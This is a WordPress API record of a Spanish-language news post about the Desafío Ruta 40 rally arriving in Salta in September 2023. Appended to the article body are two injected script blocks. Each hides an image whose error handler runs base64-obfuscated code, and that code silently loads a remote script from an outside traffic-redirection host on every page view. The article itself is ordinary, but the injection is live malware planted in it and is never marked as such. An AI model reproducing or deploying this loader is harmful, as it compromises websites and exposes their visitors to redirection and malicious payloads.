{"id":2766,"date":"2023-06-22T10:08:24","date_gmt":"2023-06-22T13:08:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2766"},"modified":"2025-08-14T00:14:26","modified_gmt":"2025-08-14T03:14:26","slug":"el-desafio-ruta-40-llegara-a-salta-el-proximo-1-de-septiembre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2766","title":{"rendered":"El Desaf\u00edo Ruta 40 llegar\u00e1 a Salta el pr\u00f3ximo 1\u00b0 de septiembre"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#d6063a\"><em>Cerca de 100 pilotos que participar\u00e1n de la 11\u00b0 edici\u00f3n del Desaf\u00edo que vuelve a formar parte del calendario del campeonato mundial de rally cross country.<\/em><\/h3>\n\n\n\n<p>El campeonato mundial de rally cross country regresar\u00e1 a tierras salte\u00f1as como parte del calendario 2023. En esta oportunidad y como parte del circuito propuesto por la hist\u00f3rica carrera Desaf\u00edo Ruta 40, Salta recibir\u00e1 a la \u00e9lite mundial de la disciplina como sede de la llegada de la competencia.<\/p>\n\n\n\n<p>Salta, La Rioja y Catamarca, ser\u00e1n los territorios que recorrer\u00e1n los cerca de 100 pilotos que participar\u00e1n de la 11\u00b0 edici\u00f3n del Desaf\u00edo. de acuerdo a lo informado por la organizaci\u00f3n, la competici\u00f3n se distribuir\u00e1 en las categor\u00edas autos, motos, cuatriciclos y UTVs.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7611-el-desafio-ruta-40-llegara-a-salta-el-proximo-1-de-septiembre.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7611-el-desafio-ruta-40-llegara-a-salta-el-proximo-1-de-septiembre.jpg\" alt=\"El Desaf\u00edo Ruta 40 llegar\u00e1 a Salta el pr\u00f3ximo 1\u00b0 de septiembre\" width=\"375\" height=\"250\"\/><\/a><\/figure><\/div>\n\n\n<p>La fecha se\u00f1alada para Salta ser\u00e1 el pr\u00f3ximo 1\u00b0 de septiembre, la provincia tendr\u00e1 el honor de ser el punto de llegada de esta m\u00edtica competencia es por eso que el Gobierno ya se encuentra trabajando en la organizaci\u00f3n preliminar de la actividad.<\/p>\n\n\n\n<p>La realizaci\u00f3n de este evento deportivo de primer nivel traer\u00e1 consigo la llegada de deportistas destacados como Nasser Al Attiyah, Carlos Sainz, Sebastien Loeb, Yazeed Al Rajhi (autos) y Kevin y Luciano Benavides, Matthias Walkner, Pablo Quintanilla, Toby Price, Adrien Van Beveren y Sam Sunderland (motos).<\/p>\n\n\n\n<p>La directora general de grandes eventos del ministerio de Turismo y Deportes,&nbsp;<strong>Mercedes Ortiz de Rozas<\/strong>, recibi\u00f3 a David Eli, organizador del Desaf\u00edo con el objetivo de mantener una reuni\u00f3n con referentes de los ministerios de Educaci\u00f3n, Cultura, Ciencia y Tecnolog\u00eda, Producci\u00f3n y Desarrollo Sustentable; de Seguridad, Salud y personal de la Direcci\u00f3n de Tr\u00e1nsito de la Ciudad de Salta.<\/p>\n\n\n\n<p>En este primer encuentro se trataron los primeros detalles de la llegada de la competencia a la provincia y se acordaron nuevas mesas de trabajo espec\u00edficas con cada organismo involucrado para las pr\u00f3ximas semanas.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7612-el-desafio-ruta-40-llegara-a-salta-el-proximo-1-de-septiembre.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7612-el-desafio-ruta-40-llegara-a-salta-el-proximo-1-de-septiembre.jpg\" alt=\"El Desaf\u00edo Ruta 40 llegar\u00e1 a Salta el pr\u00f3ximo 1\u00b0 de septiembre\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-desafio-ruta-40-llegara-a-salta-el-proximo-1-de-septiembre-90269\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Cerca de 100 pilotos que participar\u00e1n de la 11\u00b0 edici\u00f3n del Desaf\u00edo que vuelve a formar parte del calendario del campeonato mundial de rally cross country. El campeonato mundial de rally cross country regresar\u00e1 a tierras salte\u00f1as como parte del calendario 2023. En esta oportunidad y como parte del circuito propuesto por la hist\u00f3rica carrera [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2767,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-2766","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2766"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2766"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2766\/revisions"}],"predecessor-version":[{"id":7049,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2766\/revisions\/7049"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2767"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2766"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2766"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2766"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}